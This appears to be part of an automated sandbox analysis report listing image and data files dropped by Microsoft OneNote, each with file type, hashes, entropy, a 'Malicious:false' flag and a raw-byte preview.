                                                                                                                                                                                                              SHA-256:71F2564399CD6D04DD3F4E1E7C28984764DCE7AF856F35E234B6FD66007E38F1
                                                                                                                                                                                                              SHA-512:F91F3D3790EDA15162EBC9F9C4FBB52DDE029E8381842A5BDCE1C41F8CF4ADF2C8749C908806D07DD8F9F4E022430EAF57570FBE82C4B24C6C7FF14AD0E81187
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ..B.......B./.........t..B./.........t..B..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............A...89..]..B.M.....N...^....................-E...&.K.-........f........................................I.qk..B.....LZ............A...89..]..B.M.........A...89..]..B.M............B.......B.......B...........................................Bj......BT.]....B.......B..B....BH......B..B....B..>.)..B..J...................;........4...4...4.."................B...B...B..z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4...........B.......B....#..B............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):34299
                                                                                                                                                                                                              Entropy (8bit):7.247541176493898
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:BrSX4V3P8AIc4KLkHeXRUer0zrhOmXfvG0yH82I:tSXuIc4K2eBtswKsHg
                                                                                                                                                                                                              MD5:E9C52A7381075E4EBC59296F96C79399
                                                                                                                                                                                                              SHA1:BE295AD24D46E2420D7163642B658BF3234A27EA
                                                                                                                                                                                                              SHA-256:D56CEFE9EE2FAE72E31BDBA7DD2AA4426EA22E3CEB22EF68C8F63F9F24D5A8BC
                                                                                                                                                                                                              SHA-512:95CC96DD4459EBAE623176033BA204CCDC50681A768F8CBAE94C16927D140224E49D5197CAE669C83C77010C5C04C1346CF126BEF49DB686F636C5480342A77F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.......................................................................................!.1..A..Qaq......".#4.2r3.$.%...B.5U&6....Rb.Cs.7..cDTEFVf'...S..dtevw.u.........Gg.....................!1..AQ.aq.2....."#3.4....r..BRb$CS.D............?..5..............#....v.q.m.}\..{....;...r....h.....J..q|..'.;\..6..v......e...../.k..|.8..i..|..]..3e.m....n..Z.GS..n".y..w.-...[a...7A.....i.4.)9\..~C...=.........s..\V]c.D1<./.g.l.&v..~.h..]....zb>G..y:vNS.\......LU....t.{*..Z#.?..v-...wn.rR...P.....y\=.v....../..9_...m4...V.|.+.o.#.......xj....}..>.s.>C...m.[;.>.p...=^.i.X.(..1...{.F#N.W...xi.z...4..u[{...yO.....8..}\..2...KlX.nbya...2.&.F...R.b.k.7.GV.x.h.y\.Q..O<\>......-...=...r......\......Z.Z...Jf.'....z..Y.q>.p....o..K....h..R..c.lg?......A.Z...Y.q3.L|.'5...
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.335535899547569
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:W1sz4vuJaFS8st8Y6cEHSFLrKoWXW/KoW9DsotrdqruiRXDD10t/ZG1:W1sQuY/s2qEyF8Xf9DsURyZZetZG
                                                                                                                                                                                                              MD5:90B38E894F868DA198C19340984EDC7F
                                                                                                                                                                                                              SHA1:872740DF0E457DFE572E675FB088F3C9E7AAD505
                                                                                                                                                                                                              SHA-256:640BA320CBD981C9108335C71F92637C2A22EC0B1D7AE5F37E13EAEF6E683301
                                                                                                                                                                                                              SHA-512:6CE0A90C08A88A1E731F9B2C7763CE2B004483DAC1599B7EC766737920F29EC72AF6D2D7B25C2FA77E31241D9DEA28C19C9B4498D9DD88F87E63E5A25A88BD3F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZO......O..K..?S../.s.O..K..?S../.s.O...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............s...N.7,.4...`....N...^...............n.#1..EJ.h.f...........f........................................I.qk..B.....LZ..............s...N.7,.4...`..........s...N.7,.4...`.........O......O......O..........................................O.j....O.T.]..O......O...B..O.H....O...B..O...>.)O...J...................;........4...4...4.."..............O..O..O...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........O......O.....#O.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 171 x 552, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):10056
                                                                                                                                                                                                              Entropy (8bit):7.956064700093514
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:edmu1fpj5DVHuooK4EpGLbAdT+dBXYBR8D1V2p6KwoPR6KUX9ojwRpgA:2Pp/B4LbAF+dBo/1E3S6JScpgA
                                                                                                                                                                                                              MD5:E1B57A8851177DD25DC05B50B904656A
                                                                                                                                                                                                              SHA1:96D2E31A325322F2720722973814D2CAED23D546
                                                                                                                                                                                                              SHA-256:2035407A0540E1C4F7934DB08BA4ADD750FCB9A62863DDD9553E7871C81A99E3
                                                                                                                                                                                                              SHA-512:BC7DC1201884E6DAFDC1F9D8E32656BFAEE0BB4905835E09B65299FE2D7C064B27EAA10B531F9BECF970C986E89A5FD8A0B83F508BBA34EB4E38B3F7F5FC623A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......(.....!..t....PLTE.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................4.....bKGD....H....cmPPJCmp0712....H.s...#.IDATx^.w`......$..B....... ....fz5..6`l\.8...Nsz{.//y./....{.7}g.....e.....~.......s...f.....%c...6....O.PJ...Y.oi...9..'j.2..6.-
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.3036234385693914
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:usaFAS46rwtEfYWsXGfyWs9DXgRyQ/lIAgJ:usaFAQwKffsXGf9s9DXgRyqlp
                                                                                                                                                                                                              MD5:669DB01CDE2D4A8391D94DCAA253EAB6
                                                                                                                                                                                                              SHA1:DF0AC7EA19CCAED8FBC313B9A5CCEF0ED9A2DD2C
                                                                                                                                                                                                              SHA-256:C4E706E95E5B55F6D0300FF3004E689EC251A9C2E7543C72F188708304A26E75
                                                                                                                                                                                                              SHA-512:FFC915D00CCB7247057F64A6D8A92CED69EDF27B8D0FAB4E3A3395231CB111A5A13167B55CFFF807F14144D9392EC28398B58BA9ACCA3E335CE5EA1ABBD9F5F2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.c.......c..z.F.)....._..c..z.F.)....._..c...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............i....V.(...e......N...^................Q[%7E.G.i.].Xd ........f........................................I.qk..B.....LZ.............i....V.(...e...........i....V.(...e............c.......c.......c...........................................c.j.....c.T.]...c.......c...B...c.H.....c...B...c...>.).c...J...................;........4...4...4.."...............c...c...c...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4..........c.......c.....#.c.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:11:38], progressive, precision 8, 577x757, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):84097
                                                                                                                                                                                                              Entropy (8bit):7.78862495530604
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:cgHTEuD99rHwA5MSadIV2MApVmfJkAKOQ/Z1I7ngpDDyHfKFVITrU:HHjXidIhApV88/jIEmrU
                                                                                                                                                                                                              MD5:37EED97290E8ECB46A576C84F0810568
                                                                                                                                                                                                              SHA1:18D9FACB4CFA3CBF63B882CABCF30B203EDF4126
                                                                                                                                                                                                              SHA-256:140DD943D0F0CFE6AAA98470B7D1A7CB62CA02CB1D8F522DD2AC77433232EF41
                                                                                                                                                                                                              SHA-512:E0F57314C136211B8253EB2AC0093DED82198E7170D4F97C40D82FD4EC4123D2AAFE3EB4EBC3E7523C4DF4D77619408773871BDE15B6DC6C4049C71D5B9D4222
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....hExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:11:38.............................A.......................................................&.(.................................2.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................z.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....b.xH......T..I...S.q.~..../s.R.x.....8.a..vE.5...-.G.A.4...._......$K..d.@NC.q....J.....>e".I.%...I0).R.I$........M3.F .
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.331219532374096
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:ycsBsrBkYspsohUMNXjtJiEMxQXhJ9Dhu6oVrdqrJrJRXedss83spsisrfpsqsYF:ycsBuIqsXj2EbXhJ9D86MRy/vInA7xT
                                                                                                                                                                                                              MD5:A5FE2BDCD0527488DDA07E93CDF5738B
                                                                                                                                                                                                              SHA1:70FEC24D3D3B81F77383B0A91E9C3B42E2DC0E4D
                                                                                                                                                                                                              SHA-256:9ABAEBCE9783CF7A255280BE3E613F196DE759929FA9AD13DBE0C34AD4BA57DF
                                                                                                                                                                                                              SHA-512:2CDEAD3AA41D994289818667F2BF8FA0E51F68F28871CAD51BA86605727EE3D4A320B2935471E4839CEC76BEEB0424004C6D1EF59C5B697B2F7F3E2F9EA7DBE0
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......L...v...@...................................................................................................................................2...>...(.......v...t............................I.......I.qk..B.....LZ[@......[@.Wa...n40s.O.[@.Wa...n40s.O.[@...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............T..3...}*....B....N...^.................4Z...E..h.<.^.........f........................................I.qk..B.....LZ.............T..3...}*....B.........T..3...}*....B.........[@......[@......[@..........................................[@.j....[@.T.]..[@......[@..B..[@.H....[@...B..[@...>.)[@...J...................;........4...4...4.."..............[@..[@..[@...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4.........[@......[@.....#[@.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:26:15], progressive, precision 8, 216x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):64118
                                                                                                                                                                                                              Entropy (8bit):7.742974333356952
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:ORG4azGOKXzkEmR4bdRSbxONOoz0khbSb4J/5GZK5SWUlRwUYdv1M:ZXzGXzJdhRmgHfIb4J/5GZK5SWUldYdq
                                                                                                                                                                                                              MD5:864EEA0336F8628AE4A1ED46D4406807
                                                                                                                                                                                                              SHA1:CFCD7A751DFDBE52A20C03EE0C60FDFFA7A45B93
                                                                                                                                                                                                              SHA-256:7CE10D1EA660D2F9CF8B704F3FAB2966A4CE2627D9858D32C75D857095012098
                                                                                                                                                                                                              SHA-512:0CAA0C54C14571C279A75F0D5922F78A17803CF6EE1724D66819F7F5944C0F5B25CB586BB686A52808CDF2F8FEB3E4864052A914884054EF7DE44124A8CA951E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:26:15.....................................................................................(.....................&...........s.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................#.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....NC+n....<.=.7..&.8A56..@^.Q..\\...E.>..".&G.......J .'....$.I)........0.../..mv...D....<v0=..ugc+..l.o...=.c.......x.&D..{`8...v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.356012657470925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:yBsPm5+o85c/tsIkEp2XT9H5oNrdqrvCB3rRXUt+eFD1AKNREH6:Os2n8a/edEIXT9H5MRyvOE+QBXNREH
                                                                                                                                                                                                              MD5:ECB2C7727EAD63DA88044697B8B3C8DA
                                                                                                                                                                                                              SHA1:2838AC5F5AC5B722A27A33EB235C8EDF7B7B4DB1
                                                                                                                                                                                                              SHA-256:53530F0728ED336B2E9DE634075B80114A96FA39FAF7C5BC979D24BE1812AF74
                                                                                                                                                                                                              SHA-512:FB8BDF80F96F6D842F00B58282198F174A8D8F0DABEC57776C5A12F828677A7DD22ABF50E9B8E1C7E8F09AFF213903CC68123C47D3350DCD4B24D232226442F7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ.E.......E..2gH........k.E..2gH........k.E...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............I/.....:c........N...^................P..e.jN.s.KANB6........f........................................I.qk..B.....LZ.............I/.....:c.............I/.....:c..............E.......E.......E...........................................E.j.....E.T.]...E.......E...B...E.H.....E...B...E...>.).E...J...................;........4...4...4.."...............E...E...E...z...y.. x.. ...........$........4...*..7*..7........................;........4...4...4..........E.......E.....#.E.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:09:29], progressive, precision 8, 609x675, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):65998
                                                                                                                                                                                                              Entropy (8bit):7.671031449942883
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:klZtmExaFrtWgpc+Sg+DKeplHClpHfRtPMbe:VEWWl+SNDKqlH8p/vse
                                                                                                                                                                                                              MD5:B4F0A040890EE6F61EF8D9E094893C9C
                                                                                                                                                                                                              SHA1:303BCBA1D777B03BFD99CC01A48E0BB493C93E04
                                                                                                                                                                                                              SHA-256:1F81DDE3B42F23F0666D92EBF14D62893B31B39D72C07AEE070EAE28C2E6980E
                                                                                                                                                                                                              SHA-512:8F07E4D519F2FD001006BB34F7F8274B9AF9EC55367B88D41D24E5824FCE4354FD1290CE4735E43930829702ED53F41DF02C673904A7091E9354C28E029AD4EF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:09:29.............................a.......................................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..-O..s(...gO..@...[..+....+...H.'m........L.......@.......[k...S..O..p.'{X..3......]W..w.+.V....[.-.....2..i..i$.p.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):3.2514685083487906
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:CsuquvlOS+WEcQqzXZ49Q9fDqh7IR0vqJPi:CsuquvlOfcJXyG9fa7IR02P
                                                                                                                                                                                                              MD5:8D151DA538F79419BEC8A47DA067ED06
                                                                                                                                                                                                              SHA1:616C594CD05174950267F1A67BC13ACECDDF6CA1
                                                                                                                                                                                                              SHA-256:9FB13D285C7D029280F656FB771D9AA6D220991BBCB90B3D960194BCE6CC967C
                                                                                                                                                                                                              SHA-512:3655020E9F7077B35F330085FDB3A7EAFBE695BF3019025F0062A4F56AB7D64821C09E6F2AE0546E141EA0E60366438B61655EE43E9EB4F35349EF214479899E
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v.......................................................................................................................................2...>...j.......v................................I.......I.qk..B.....LZ..M.......M..x...........M..x...........M..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............R.`..^...<........N...^................I.`..I..w.5.o.........&...................................>....I.qk..B.....LZ.............R.`..^...<.............R.`..^...<...............M.......M.......M...........................................Mj......MT.a....M.......M..D....MH......M..N....M..?.#..M..9...................;........4...4...4.."................M...M...M..z...y.. x.. ...........$........4...*..7*..7...........Op.b..F.$..i.................;........4...4...4...........M.......M....#..M............................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 189 x 305, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):12824
                                                                                                                                                                                                              Entropy (8bit):7.974776104184905
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:gzPrAZvq82AP0/DHbSczEegiAh1Hfgr3ZO7EFKWHaXIXqu:erAZz200/TbJzDgiWgjZO7EFKEaXIf
                                                                                                                                                                                                              MD5:2628353534C5AD86CBFE57B6616D46DD
                                                                                                                                                                                                              SHA1:244B7E39D6CEF5B07FCDE80554D31F7DA240BB0D
                                                                                                                                                                                                              SHA-256:69BDB000AC7E030B0B28E6CE78F19547D235355B3B841146951AD1294429FA51
                                                                                                                                                                                                              SHA-512:2529F97BE62DE038445D1C86EE2C01404FB1A2D83A5D16C7B5F4E21723C17EC86FA180DFE10342536CFD7D334EA3AF1FFE151B77F2FBFFFE8E7B2A0C2A3ACD59
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR.......1.....).'....sRGB.........pHYs..........+....1.IDATx^.}.w\.n...A.H...E.J...l.......p...\{.w...e.-K.%..d.9..DN...^}..p.L...._$.t...n.=U..ID..]~(.?.)J...-.../.......0V..........'.)1X..c..D..2..A'f."...Ru..R=b..\....\.n.0...7.~".'..s!bd.|..p.u....-w'.....R.........i]..r....A.........r#...W..f{O.2~C.O........{.....3..W.}e:...~.....4.......t.Mv_....}*f..I...x11....d..6.@..O.......f.e..K.....L]..gohj&D..+.....#...#.J...n/]...8~.....zx.'.LI6..W....p...................V.F.. ...y.[.kl<?.^....N..$..7j.biU....c.51{S{.....q....c...<..x..............zG.F*.........U.w..fE.....DU.......WG7.5uC...7.....j..7yM...~jU..;J..a|LoG..x..<^.Z ...Z.....ip....._.4......f.rg..[...z....x1k.....z...K.l...;6.\..Y.#.WT.p.@{W....>.+..*..W....'v.nV...YA[.q!\.\...9..3.[|....7...HO......2<.....w.,].T^eN..XB.....M3...I.k...e..8...lZ.R...T.%......|N.w..9..!..O.-p..NA.eD_.d..nW2!...N...z>..;....=t#....H,.N.|. ......EC..............1.\
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):32656
                                                                                                                                                                                                              Entropy (8bit):3.9517299510231485
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:qR0eV0V6zLq8fAy7TtS1O6VILpjH5og6NJgnIuu57aqP+Tg3QePV2P6hqaJDyjJg:qlzzaRpbd1
                                                                                                                                                                                                              MD5:DD4CA4BC0A73FCB71BEBAA3C29CB8F66
                                                                                                                                                                                                              SHA1:1A7085771D7941540EC94A1BD24D7CC8EA556D4B
                                                                                                                                                                                                              SHA-256:0401451E1D1D7DFDC29AD1B2B68A6C8AC0B706E9868BF22FAB26A01CD48620CE
                                                                                                                                                                                                              SHA-512:5B7D386C46EC75E21DE94DBCA922FB9A6E5358DEB3D60FEEE7B197D739F15D11050825D9323502EDFAF60720F1074DE896B23E71C44D07C9C7E943C31FDC078A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:....l...r...1...*...^...bX.......^...... EMF........h...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC....s...2...+...^.......F...(.......GDIC....s...2.......N.......F...........EMF+*@..$..........?...........?.........@........................(E..HB.'E..HB.0'EI.`B.0'EU5.B.0'E..B.'EU5.B..(EU5.B.(EU5.B..(E..B..(EU5.B..(EI.`B.(E..HB..(E..HB.................@..............!.......b...........$...$......>...........>............'......................%.......................;.......U...P........................T...S...S...S...S8..Si..Ti.@Ti.qT8.qT..qT..@T...T..<.......>.......r...1.......N...............%...........$...$......A...........A............"...........F...........EMF+.@..........F...........GDIC....F...(.......GDIC........2.......N.......F...........EMF+*@..$..........?...........?.........@.......................}*E
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
